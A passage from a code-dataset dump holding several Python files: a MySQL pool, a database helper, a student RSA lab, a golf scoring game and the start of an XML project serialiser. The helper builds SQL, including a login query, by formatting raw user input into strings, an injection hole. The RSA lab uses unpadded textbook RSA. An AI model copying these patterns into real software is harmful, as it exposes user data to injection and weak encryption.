ConnMysql.getmysqlconn()\n self.cur = self.coon.cursor(cursor=pymysql.cursors.DictCursor)\n\n # 数据库连接池连接\n @staticmethod\n def getmysqlconn():\n global __pool\n if ConnMysql.__pool is None:\n __pool = PooledDB(\n creator=pymysql,\n mincached=1,\n maxcached=5,\n maxconnections=6,\n maxshared=3,\n blocking=True,\n maxusage=None,\n setsession=[],\n ping=2,\n host=mysqlInfo['host'],\n user=mysqlInfo['user'],\n passwd=mysqlInfo['passwd'],\n db=mysqlInfo['db'],\n port=mysqlInfo['port'],\n charset=mysqlInfo['charset'])\n return __pool.connection()\n\n # 插入、修改、删除一条\n def sql_change_msg(self, sql):\n change_sql = self.cur.execute(sql)\n self.coon.commit()\n return change_sql\n\n # 查询一条\n def sql_select_one(self, sql):\n self.cur.execute(sql)\n select_res = self.cur.fetchone()\n return select_res\n\n # 查询多条\n def sql_select_many(self, sql, count=None):\n self.cur.execute(sql)\n if count is None:\n select_res = self.cur.fetchall()\n else:\n select_res = self.cur.fetchmany(count)\n return select_res\n\n # 释放资源\n def release(self):\n self.coon.close()\n self.cur.close()\n","sub_path":"OSS2存储_1.0/mysql_pool/sql_pool.py","file_name":"sql_pool.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"298834922","text":"import threading\nimport mysql\nimport json\nimport database.model.insert as insert\n\nfrom design_patterns.singleton.singleton import Singleton\nfrom database.database_connector import DatabaseConnector\nfrom database.database_helper_exception import DatabaseHelperException\nfrom database.database_helper_exception_type import DatabaseHelperExceptionType\n\n\n\n@Singleton\nclass DatabaseHelper(DatabaseConnector):\n def __init__(self):\n self._initialize_database_connector()\n self.__INSERT_CATEGORY_SQL = self.__load_sql_question_from_file(\"sql/insert/category.sql\")\n self.__INSERT_CONTENT_SQL = self.__load_sql_question_from_file(\"sql/insert/content.sql\")\n self.__INSERT_CONTENT_WITH_SCRIPT_SQL = self.__load_sql_question_from_file(\"sql/insert/content_with_script.sql\")\n self.__INSERT_CONTENT_SCRIPT_SQL = self.__load_sql_question_from_file(\"sql/insert/content_script.sql\")\n self.__INSERT_DIAMETER_SQL = self.__load_sql_question_from_file(\"sql/insert/diameter.sql\")\n self.__INSERT_LOCALIZATION_SQL = self.__load_sql_question_from_file(\"sql/insert/localization.sql\")\n self.__INSERT_OPENING_HOURS_SQL = self.__load_sql_question_from_file(\"sql/insert/opening_hours.sql\")\n self.__INSERT_PREFERENCE_SQL = self.__load_sql_question_from_file(\"sql/insert/preference.sql\")\n self.__INSERT_SERVICE_SQL = self.__load_sql_question_from_file(\"sql/insert/service.sql\")\n self.__INSERT_SERVICE_POINT_SQL = self.__load_sql_question_from_file(\"sql/insert/service_point.sql\")\n self.__INSERT_SERVICE_POINT_OPENING_HOUR_SQL = self.__load_sql_question_from_file(\"sql/insert/service_point_opening_hour.sql\")\n self.__INSERT_SERVICE_UPDATE_TIME_SQL = self.__load_sql_question_from_file(\"sql/insert/service_update_time.sql\")\n self.__INSERT_USER_SQL = self.__load_sql_question_from_file(\"sql/insert/user.sql\")\n \n self.__SELECT_CATEGORIES_SQL = self.__load_sql_question_from_file(\"sql/select/categories.sql\")\n self.__SELECT_TOKEN_SQL = self.__load_sql_question_from_file(\"sql/select/token.sql\")\n self.__SELECT_USER_SQL = self.__load_sql_question_from_file(\"sql/select/user.sql\")\n self.__SELECT_USER_WITH_LOGIN_SQL = self.__load_sql_question_from_file(\"sql/select/finduser.sql\")\n\n self._lock = threading.RLock()\n\n def __load_sql_question_from_file(self, file_path):\n try:\n with open(file_path, \"r\") as sql_file:\n question = sql_file.readlines()\n question = \"\".join(question)\n return question.lstrip().rstrip()\n except:\n pass\n\n def insert_category(self, category):\n if not isinstance(category, insert.Category):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_CATEGORY_SQL.format(*category))\n\n def insert_content(self, content):\n if not isinstance(content, insert.Content):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_CONTENT_SQL.format(*content))\n\n def insert_content_script(self, content_script):\n if not isinstance(content_script, insert.ContentScript):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_CONTENT_SCRIPT_SQL.format(*content_script))\n\n def insert_content_with_script(self, content_with_script):\n if not isinstance(content_with_script, insert.ContentWithScript):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_CONTENT_WITH_SCRIPT_SQL.format(*content_with_script))\n\n def insert_diameter(self, diameter):\n if not isinstance(diameter, insert.Diameter):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_DIAMETER_SQL.format(*diameter))\n\n def insert_user(self, user):\n if not isinstance(diameter, insert.User):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_USER_SQL.format(*user))\n\n def insert_localization(self, localization):\n if not isinstance(localization, insert.Localization):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_LOCALIZATION_SQL.format(*localization))\n\n def insert_opening_hours(self, opening_hours):\n if not isinstance(opening_hours, insert.OpeningHours):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_OPENING_HOURS_SQL.format(*opening_hours))\n \n def insert_preference(self, preference):\n if not isinstance(preference, insert.Preference):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_PREFERENCE_SQL.format(*preference))\n\n def insert_service(self, service):\n if not isinstance(service, insert.Service):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_SERVICE_SQL.format(*service))\n\n def insert_service_update_time(self, service_update_time):\n if not isinstance(service_update_time, insert.ServiceUpdateTime):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_SERVICE_UPDATE_TIME_SQL.format(*service_update_time))\n\n def insert_service_point(self, service_point):\n if not isinstance(service_point, insert.ServicePoint):\n raise ValueError(\"Argument isn't insert object\")\n try:\n self.insert_localization(service_point.localization)\n except DatabaseHelperException as error:\n if not error.exception_type == DatabaseHelperExceptionType.DUPLICATE_ENTRY:\n raise\n return self._execute_sql_insert_question(self.__INSERT_SERVICE_POINT_SQL.format(*service_point))\n \"\"\"\n def insert_service_point_opening_hour(self, service_point_opening_hours):\n if not isinstance(service_point_opening_hours, insert.ServicePointOpeningHours):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_SERVICE_POINT_OPENING_HOUR_SQL.format(*service_point_opening_hours))\n \"\"\"\n def insert_user(self, user):\n if not isinstance(user, insert.User):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_USER_SQL.format(*user))\n\n def __decode_data_from_database_into_json(self, columns, data):\n if len(data) == 0:\n jsondata = \"\"\n elif len(data) == 1:\n jsondata = dict()\n for i, column_value in enumerate(data[0]):\n if type(column_value) is bytearray:\n column_value = column_value.decode(\"utf-8\")\n jsondata[columns[i]] = column_value\n else:\n jsondata = list()\n for row in data:\n row_values = dict()\n for i, column_value in enumerate(row):\n if type(column_value) is bytearray:\n column_value = column_value.decode(\"utf-8\")\n row_values[columns[i]] = column_value\n jsondata.append(row_values)\n return json.dumps(jsondata)\n\n def select_categories(self):\n return self.__decode_data_from_database_into_json(*self._execute_sql_select_question(self.__SELECT_CATEGORIES_SQL))\n\n def select_token_for_user_with_email_and_password(self, user, password):\n return self.__decode_data_from_database_into_json(*self._execute_sql_select_question(self.__SELECT_TOKEN_SQL.format(user, password)))\n\n def select_user_for_token(self, token):\n return self.__decode_data_from_database_into_json(*self._execute_sql_select_question(self.__SELECT_USER_SQL.format(token)))\n\n def select_user_with_login(self, user):\n return self.__decode_data_from_database_into_json(*self._execute_sql_select_question(self.__SELECT_USER_WITH_LOGIN_SQL.format(user)))","sub_path":"Serwer/database/database_helper.py","file_name":"database_helper.py","file_ext":"py","file_size_in_byte":8276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"301996824","text":"from random import randint as rd\nfrom math2 import Power_by_modulus\nprimary = [2, 3, 5, 7,11,13, 17, 19, 23, 29, 31] \ndef ExEuclid(q, w):\n\t\tif q == 0:\n\t\t\treturn (w, 0, 1)\n\t\telse:\n\t\t\tgcd, first, second = ExEuclid(w % q, q)\n\t\t\treturn (gcd, second - (w // q) * first, first)\n\n\ndef Trivial_check(dec_number):\n\tdecimal_number = dec_number\n\tglobal primary\n\tfor i in primary:\n\t\tif decimal_number % i == 0:\n\t\t\treturn False\n\treturn True\n\n\nclass User():\n\tdef __init__(self):\n\t\tself.__p = self.GeneratePN()\n\t\tself.__q = self.GeneratePN()\n\t\tprint(\"aaaaaa\",self.__p,self.__q)\n\t\tself.n = self.__p * self.__q\n\t\tself.__fi = self.FiFunction()\n\t\tself.GenerateKeyPair()\n\n\tdef GenerateRand(self,length = 128):\n\t\tbinary_number = \"\"\n\t\tfor i in range(length - 2):\n\t\t\tbinary_number += str(rd(0,1))\n\t\tbinary_number =\"1\" + binary_number[:] + \"1\"\n\t\treturn binary_number\n\n\tdef FiFunction(self):\n\t\treturn (self.__q - 1)*(self.__p - 1)\n\n\tdef GenerateKeyPair(self):\n\t\tself.e = rd(2,self.__fi - 1)\n\n\t\twhile ExEuclid(self.e,self.__fi)[0] != 1:\n\t\t\tself.e = rd(2,self.__fi - 1)\n\t\tself.__d = ExEuclid(self.e,self.__fi)[1]%self.__fi\n\t\tprint(str(hex(self.e)[2:]),\" ASDASDA \",str(hex(self.n)[2:]))\n\n\tdef Encryption(self,PlainText,receiver_e,receiver_n):\n\t\treturn Power_by_modulus(PlainText,receiver_e,receiver_n)\n\n\tdef DigitalSignature(self,PlainText):\n\t\treturn Power_by_modulus(PlainText,self.__d,self.n)\n\n\tdef SignatureVerification(self,PlainText,Digest,sender_e,sender_n):\n\t\treturn PlainText == Power_by_modulus(Digest,sender_e,sender_n)\n\n\tdef Decryption(self,CipherText):\n\t\treturn Power_by_modulus(CipherText,self.__d,self.n)\n\n\tdef SendKey(self,PainText,receiver_e,receiver_n,sender_e,sender_n):\n\t\treturn (self.Encryption(PainText,receiver_e,receiver_n),self.Encryption(self.DigitalSignature(PainText),receiver_e,receiver_n),(sender_e,sender_n))\n\n\tdef ReceiveKey(self,CipherText,DigitalSignature,senders_public):\n\t\tPainText = self.Decryption(CipherText)\n\t\tprint(PainText)\n\t\tDS = self.SignatureVerification(PainText,self.Decryption(DigitalSignature),senders_public[0],senders_public[1])\n\t\tif DS:\n\t\t\treturn (PainText,DS)\n\t\treturn None\n\n\tdef PrimaryTestMillera_Rabina(self,dec_number):\n\t\tk = 0\n\t\tdecimal_number = dec_number - 1\n\t\tdecimal = decimal_number + 1\n\t\td,s = 0,0\n\t\twhile not(decimal_number % 2 == 1):\n\t\t\tdecimal_number = decimal_number // 2\n\t\t\ts = s + 1\n\t\td = int(decimal_number)\n\t\twhile k != 5:\n\t\t\tx = rd(2,decimal - 1)\n\t\t\tif ExEuclid(decimal,x)[0] != 1:\n\t\t\t\treturn False\n\t\t\tif Power_by_modulus(x, d, decimal) in [-1 % decimal,1]:\n\t\t\t\tk += 1\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcheck = False\n\t\t\t\tfor i in range(1,s):\n\t\t\t\t\tr = Power_by_modulus(x,d * pow(2,i), decimal)\n\t\t\t\t\tif r == 1:\n\t\t\t\t\t\treturn False\n\t\t\t\t\tif r == -1 % decimal:\n\t\t\t\t\t\tcheck = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif not check :\n\t\t\t\t\treturn False\n\t\t\tk += 1\n\t\treturn decimal\n\n\t\n\tdef GeneratePN(self):\n\t\tp = int(\"\".join(self.GenerateRand()),2) - 2\n\t\twhile True:\n\t\t\tp += 2\n\t\t\tprint(p)\n\t\t\t#if not Trivial_check(p):\n\t\t\t#\tcontinue\n\t\t\tadvanced_p = self.PrimaryTestMillera_Rabina(p)\n\t\t\tif advanced_p :\n\t\t\t\treturn advanced_p\n\n\na = User()\nSite_public_n = int(\"D499BB1FEA2F8BB3DD8FF84D056BC297DF552EECCC01CD607793CEDD534DD3C7\",16)\nprint(Site_public_n,\" DD\")\nSite_public_e = int('10001', 16)\nwhile a.n > Site_public_n:\n\t\n\ta = User()\n\ntpl = a.SendKey(772236207544142343524988776290862243162112092754627934242299,Site_public_e,Site_public_n,a.e,a.n)\nprint(\"AAAAAAAAAAAAAAA \",str(hex(tpl[0])[2:]))\nprint(\"DS \",str(hex(tpl[1])[2:]))\n#print(tpl)\n#print(b.ReceiveKey(tpl[0],tpl[1],tpl[2]))\n#print(b.Decryption(a.Encryption(2,b.e,b.n)))\n\n","sub_path":"cp_5/korol_fb-72_stepanets_fb-72_cp5/lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"174995582","text":"\"\"\" game.py - GolfGame class.\"\"\"\nfrom .game import GolfGame\nfrom .exceptions import GolfException\n\n\nclass SixPointGame(GolfGame):\n \"\"\"Six point golf game.\"\"\"\n\n short_description = \"Six Point\"\n description = \"\"\"\nIn the Six Point Game, three players compete for six points per hole.\nBefore the game, the players should agree to how much each point is worth\n(consider that a player who never wins a point on any hole will owe about 100 points to his/her friends).\n\nHandicaps are used in this game - the best player plays as scratch, and the other two players receive the\nsame number of strokes as the difference between their and the best player's course handicap. \n\nOn each hole, the points can break down in four ways (as mentioned above, the scores on each hole are adjusted by the players' handicaps):\nIf there is a clear winner on the hole, that player wins 4 points. The golfer who finishes second receives 2 points, and the last place golfer receives nothing (4-2-0).\nIf two golfers tie for second they each receive 1 point, and the clear winner receives 4 points. (4-1-1).\nIf two golfers tie for lowest score, they win 3 points each, and the golfer with the high score receives nothing (3-3-0).\nIf all three golfers tie the hole, they each receive 2 points (2-2-2).\nAt the end of the match, all the points are totaled, with the low-point-total player paying both the other players a sum based on the difference between their final point totals. The player with the second highest point total also pays the high-point player based on the difference between their point totals.\n\"\"\"\n POINTS_WIN_1ST = 4\n POINTS_TIE_1ST = 3\n POINTS_WIN_2ND = 2\n POINTS_TIE_2ND = 1\n POINTS_ALL_TIE = 2\n POINTS_3RD = 0\n TITLE = \"Six Point\"\n NAME = \"six_point\"\n\n def validate(self):\n if len(self.scores) != 3:\n raise GolfException(\n \"Six point game must have 3 players, {} found.\".format(len(self.scores))\n )\n\n def start(self):\n \"\"\"Start the skins game.\"\"\"\n # find min handicap in all players\n min_handicap = min([gs.course_handicap for gs in self.scores])\n for sc in self.scores:\n # net start\n sc._score = [None for _ in range(len(self.golf_round.course.holes))]\n sc._bumps = self.golf_round.course.calcBumps(\n sc.course_handicap - min_handicap\n )\n sc._points = [None for _ in range(len(self.golf_round.course.holes))]\n sc._in = 0\n sc._out = 0\n sc._total = 0\n self.dctScorecard[\"header\"] = \"{0:*^98}\".format(\" {} \".format(self.TITLE))\n self.dctLeaderboard[\"hdr\"] = \"Pos Name Points Thru\"\n\n def addScore(self, index, lstGross):\n \"\"\"add scores for a hole.\"\"\"\n # update net values\n for gs, gross in zip(self.scores, lstGross):\n gs._score[index] = gross - gs._bumps[index]\n # Determine net standings on this hole\n net_scores = [[n, sc._score[index], 0, 0] for n, sc in enumerate(self.scores)]\n net_scores = sorted(net_scores, key=lambda sc: sc[1])\n pos = 1\n prev_total = None\n for lst in net_scores:\n if prev_total != None and lst[1] > prev_total:\n pos += 1\n prev_total = lst[1]\n lst[2] = pos\n rank = [lst[2] for lst in net_scores]\n if rank.count(1) == 3:\n # 2,2,2\n for lst in net_scores:\n lst[3] = self.POINTS_ALL_TIE\n elif rank.count(1) == 2:\n # 3,3,0\n for lst in net_scores[:2]:\n lst[3] = self.POINTS_TIE_1ST\n net_scores[2][3] = self.POINTS_3RD\n else:\n # 1 winner\n net_scores[0][3] = self.POINTS_WIN_1ST\n # tie for 2nd\n if rank.count(2) == 2:\n for lst in net_scores[1:]:\n lst[3] = self.POINTS_TIE_2ND\n else:\n net_scores[1][3] = self.POINTS_WIN_2ND\n net_scores[2][3] = self.POINTS_3RD\n # put points\n for lst, sc in zip(net_scores, self.scores):\n # print lst\n self.scores[lst[0]]._points[index] = lst[3]\n for sc in self.scores:\n sc._out = sum([point for point in sc._points[:9] if isinstance(point, int)])\n sc._in = sum([point for point in sc._points[9:] if isinstance(point, int)])\n sc._total = sc._in + sc._out\n\n def getScorecard(self, **kwargs):\n \"\"\"Scorecard with all players.\"\"\"\n lstPlayers = []\n for n, sc in enumerate(self.scores):\n dct = {\"player\": sc.player}\n dct[\"in\"] = sc._in\n dct[\"out\"] = sc._out\n dct[\"total\"] = sc._total\n line = \"{:<6}\".format(sc.player.nick_name)\n for point in sc._points[:9]:\n line += \" {:>3}\".format(point if point != None else \"\")\n line += \" {:>4d}\".format(sc._out)\n for point in sc._points[9:]:\n line += \" {:>3}\".format(point if point != None else \"\")\n line += \" {:>4d} {:>4d}\".format(sc._in, sc._total)\n dct[\"line\"] = line\n lstPlayers.append(dct)\n self.dctScorecard[\"players\"] = lstPlayers\n return self.dctScorecard\n\n def getLeaderboard(self, **kwargs):\n board = []\n scores = sorted(self.scores, key=lambda score: score._total, reverse=True)\n pos = 1\n prev_total = None\n for sc in scores:\n score_dct = {\"player\": sc.player, \"total\": sc._total}\n if prev_total != None and score_dct[\"total\"] < prev_total:\n pos += 1\n\n prev_total = score_dct[\"total\"]\n score_dct[\"pos\"] = pos\n for n, point in enumerate(sc._points):\n if point is None:\n break\n else:\n n += 1\n score_dct[\"thru\"] = n\n score_dct[\"line\"] = \"{:<3} {:<6} {:>+5} {:>4}\".format(\n score_dct[\"pos\"],\n score_dct[\"player\"].nick_name,\n score_dct[\"total\"],\n score_dct[\"thru\"],\n )\n board.append(score_dct)\n self.dctLeaderboard[\"leaderboard\"] = board\n return self.dctLeaderboard\n\n def getStatus(self, **kwargs):\n for n, net in enumerate(self.scores[0]._score):\n if net is None:\n self.dctStatus[\"next_hole\"] = n + 1\n self.dctStatus[\"par\"] = self.golf_round.course.holes[n].par\n self.dctStatus[\"handicap\"] = self.golf_round.course.holes[n].handicap\n bumps = []\n bump_line = []\n for sc in self.scores:\n if sc._bumps[n] > 0:\n dct = {\"player\": sc.player, \"bumps\": sc._bumps[n]}\n bumps.append(dct)\n bump_line.append(\n \"{}{}\".format(\n sc.player.nick_name,\n \"({})\".format(dct[\"bumps\"]) if dct[\"bumps\"] > 1 else \"\",\n )\n )\n self.dctStatus[\"bumps\"] = bumps\n self.dctStatus[\"line\"] = \"Hole {} Par {} Hdcp {}\".format(\n self.dctStatus[\"next_hole\"],\n self.dctStatus[\"par\"],\n self.dctStatus[\"handicap\"],\n )\n if bumps:\n self.dctStatus[\"line\"] += \" Bumps:{}\".format(\",\".join(bump_line))\n self.dctStatus[\"line\"] += \" Points:{},{},{}\".format(\n self.POINTS_WIN_1ST, self.POINTS_WIN_2ND, self.POINTS_3RD\n )\n break\n else:\n # round complete\n self.dctStatus[\"next_hole\"] = None\n self.dctStatus[\"par\"] = self.golf_round.course.total\n self.dctStatus[\"handicap\"] = None\n self.dctStatus[\"line\"] = \"Round Complete\"\n return self.dctStatus\n","sub_path":"golf_db/game_six_point.py","file_name":"game_six_point.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"370463190","text":"import numpy as np\n\nfile=open('energies.txt')\ndata=[]\nfor line in file:\n data.append(map(float,line.split()[1:]))\n\ndata = np.array(data)\n\ntemp = data[:,11]\n\n# plot things in matplotlib\n","sub_path":"validation/adsorption/simulation/parse_lines.py","file_name":"parse_lines.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"418822617","text":"\"\"\"\nbreak\n\n\nThe given code uses an infinite loop to continuously take user input.\nDuring each iteration, the user input is added to the items list.\n\nChange the code to end the loop when the user enters 0.\nOutput the resulted list after the while loop ends.\n\nSample Input\n1\n2\n3\n0\n\nSample Output\n[1, 2, 3]\n\"\"\"\n\nitems = []\n\nwhile True:\n \n n = int(input())\n \n if n==0:\n break\n\n items.append(n)\n\n\nprint(items)","sub_path":"3. Control Structures/InfiniteLoops.py","file_name":"InfiniteLoops.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"256159008","text":"\"\"\"\nName: vizop_parser\n\"\"\"\nfrom faulttree import FTColumnInCore\n\n\"\"\"[----------TEMPLATE---------- \"\"\"\n\"\"\" ----------TEMPLATE----------]\"\"\" \n\n\"\"\"[----------IMPORT---------- \"\"\"\n\"\"\"\"\"\"\nimport xml.etree.ElementTree as ET\nimport xml\nimport string\nimport inspect\nimport projects, core_classes, faulttree, info\n\"\"\" ----------IMPORT----------]\"\"\" \n\n\"\"\"[----------CHARACTER CHECK---------- \"\"\"\nclass Chars:\n\t#Avoid sensitive/unparsable symbol\n\tVALID_CHARS = \"!#$%()*+,-.:;=?@[]^_`{|}~ %s%s\" + string.ascii_letters + string.digits\n\"\"\" ----------CHARACTER CHECK----------]\"\"\"\n\n\"\"\"[----------UTIL---------- \"\"\"\ndef pS(inputString, trimString = True, filterForbiddenChar = True, noSpace = False) -> str:\n\t# process string\n\tassert type(inputString) == str\n\tassert type(trimString) == bool\n\tassert type(filterForbiddenChar) == bool\n\tassert type(noSpace) == bool\n\t\n\tformattedString = inputString\n\tif trimString:\n\t\tformattedString = formattedString.strip()\n\t\n\tif filterForbiddenChar:\n\t\tformattedString = ''.join(c for c in formattedString if c in Chars.VALID_CHARS)\n\n\tif noSpace:\n\t\tformattedString = '_'.join(formattedString.split(' '))\n\t\n\treturn formattedString\n\ndef getNumberOfInstance(input_class):\n\t# get the number of instance for a Class by using garbage collector\n\timport gc\n\treturn ('Number of {} in memory:{}'.format(input_class,len(list(filter(lambda x: isinstance(x, input_class), gc.get_objects())))))\n\ndef autoGenerateTagID(elementRoot): #void\n\t# generate unique ID for all elements\n\tprint (type(elementRoot))\n\tassert type(elementRoot) == xml.etree.ElementTree.Element, type(elementRoot)\n\n\tiD = 1\n\tfor each_Element in elementRoot.iter():\n\t\teach_Element.set('TagID', str(iD))\n\t\tiD = iD + 1\n\tpass\n\ndef isInType(StringInput, EnumClass):\n\tassert type(StringInput) == str\n\tassert inspect.isclass(EnumClass)\n\tfor t in EnumClass:\n\t\tif t.value.lower() == StringInput.lower():\n\t\t\treturn True\n\treturn False\n\ndef getTypeByValue(StringInput, EnumClass):\n\tassert type(StringInput) == str\n\tassert inspect.isclass(EnumClass)\n\tfor t in EnumClass:\n\t\tif t.value.lower() == StringInput.lower():\n\t\t\treturn t\n\treturn None\n\n\"\"\" ----------UTIL----------]\"\"\"\n\n\"\"\"[----------Project > XML---------- \"\"\"\ndef convertProjectToXml(Proj, ProjectFilename):\n\t# convert project to XML\n\t# void, convert from Project Item to pre-defined XML project\n\tassert type(Proj) == projects.ProjectItem\n\tassert type(ProjectFilename) == str\n\n\t# write XML tree to actual file\n\tMyXMLTree = ET.ElementTree() # create new XML structure\n\n\t# set the skeleton as the XML tree root element\n\tMyXMLTree._setroot(ET.fromstring(projects.XMLTreeSkeleton))\n\tMyXMLRoot = MyXMLTree.getroot()\n\n\t# create sub-elements according to project item file structure\n\n\t# ShortTitle\n\tif Proj.ShortTitle != '':\n\t\tMyXMLRoot_ShortTitle = ET.SubElement(MyXMLRoot, info.ShortTitleTag)\n\t\tMyXMLRoot_ShortTitle.text = pS(str(Proj.ShortTitle))\n\n\t# ProjNumber\n\tif Proj.ProjNumber != '':\n\t\tMyXMLRoot_ProjNumber = ET.SubElement(MyXMLRoot, info.ProjNumberTag)\n\t\tMyXMLRoot_ProjNumber.text = pS(str(Proj.ProjNumber))\n\n\t# Description\n\tif Proj.Description != '':\n\t\tMyXMLRoot_Description = ET.SubElement(MyXMLRoot, info.DescriptionTag)\n\t\tMyXMLRoot_Description.text = pS(str(Proj.Description))\n\n\t# EditNumber\n\tif Proj.EditNumber != '':\n\t\tMyXMLRoot_EditNumber = ET.SubElement(MyXMLRoot, info.EditNumberTag)\n\t\tMyXMLRoot_EditNumber.text = pS(str(Proj.EditNumber))\n\n\t# TeamMembers\n\tif len(Proj.TeamMembers) > 0 :\n\t\t# create outer XML tag\n\t\tMyXMLRoot_TeamMembers = ET.SubElement(MyXMLRoot, info.TeamMembersTag)\n\n\t\t# TeamMember\n\t\teach_teamMember: core_classes.TeamMember\n\t\tfor each_teamMember in Proj.TeamMembers:\n\t\t\tMyXMLRoot_TeamMembers_TeamMember = ET.SubElement(MyXMLRoot_TeamMembers, info.TeamMemberTag)\n\t\t\tassert type(each_teamMember) == core_classes.TeamMember\n\n\t\t\t# \n\t\t\tMyXMLRoot_TeamMembers_TeamMember_ID = ET.SubElement(MyXMLRoot_TeamMembers_TeamMember, info.IDTag)\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_ID.text = pS(str(each_teamMember.iD))\n\n\t\t\t# \n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Name = ET.SubElement(MyXMLRoot_TeamMembers_TeamMember, info.NameTag)\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Name.text = pS(each_teamMember.name)\n\n\t\t\t# \n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Role = ET.SubElement(MyXMLRoot_TeamMembers_TeamMember, info.RoleTag)\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Role.text = pS(each_teamMember.role)\n\n\t\t\t# < Affiliation[Affiliation as str] / >\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Affiliation = ET.SubElement(MyXMLRoot_TeamMembers_TeamMember, info.AffiliationTag)\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Affiliation.text = pS(each_teamMember.affiliation)\n\n\t#Process Units\n\tif len(Proj.ProcessUnits) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_ProcessUnits = ET.SubElement(MyXMLRoot, info.ProcessUnitsTag)\n\n\t\tfor each_ProcessUnit in Proj.ProcessUnits:\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit = ET.SubElement(MyXMLRoot_ProcessUnits, info.ProcessUnitTag)\n\t\t\tassert type(each_ProcessUnit) == projects.ProcessUnit\n\n\t\t\t# \n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_ID = ET.SubElement(MyXMLRoot_ProcessUnits_ProcessUnit, info.IDTag)\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_ID.text = pS(str(each_ProcessUnit.ID))\n\n\t\t\t# \n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_UnitNumber = ET.SubElement(MyXMLRoot_ProcessUnits_ProcessUnit, info.UnitNumberTag)\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_UnitNumber.text = pS(str(each_ProcessUnit.UnitNumber))\n\n\t\t\t# \n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_ShortName = ET.SubElement(MyXMLRoot_ProcessUnits_ProcessUnit, info.ShortNameTag)\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_ShortName.text = pS(str(each_ProcessUnit.ShortName))\n\n\t\t\t# \n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_LongName = ET.SubElement(MyXMLRoot_ProcessUnits_ProcessUnit, info.LongNameTag)\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_LongName.text = pS(str(each_ProcessUnit.LongName))\n\n\t#Risk Receptors\n\tif len(Proj.RiskReceptors) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_RiskReceptors = ET.SubElement(MyXMLRoot, info.RiskReceptorsTag)\n\n\t\tfor each_RiskReceptor in Proj.RiskReceptors:\n\t\t\tassert type(each_RiskReceptor) == core_classes.RiskReceptorItem\n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor = ET.SubElement(MyXMLRoot_RiskReceptors, info.RiskReceptorTag)\n\n\t\t\t# \n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor_ID = ET.SubElement(MyXMLRoot_RiskReceptors_RiskReceptor, info.IDTag)\n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor_ID.text = pS(str(each_RiskReceptor.ID))\n\n\t\t\t#\n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor_HumanName = ET.SubElement(MyXMLRoot_RiskReceptors_RiskReceptor, info.NameTag)\n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor_HumanName.text = pS(each_RiskReceptor.HumanName)\n\n\t# Numbering Systems\n\tif len(Proj.NumberSystems) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_NumberSystem = ET.SubElement(MyXMLRoot, info.NumberSystemTag)\n\n\t\tfor each_NumberSystem in Proj.NumberSystems:\n\t\t\t#TODO J: cannot map NumberSystem ID\n\n\t\t\t# create outer XML tag\n\t\t\tMyXMLRoot_NumberSystem_Chunk = ET.SubElement(MyXMLRoot_NumberSystem, info.NumberSystemTag)\n\n\t\t\t#each_NumberSystem: str\n\t\t\tif type(each_NumberSystem) == str:\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.TypeTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type.text = pS(info.NumberSystemStringType)\n\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Value = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, 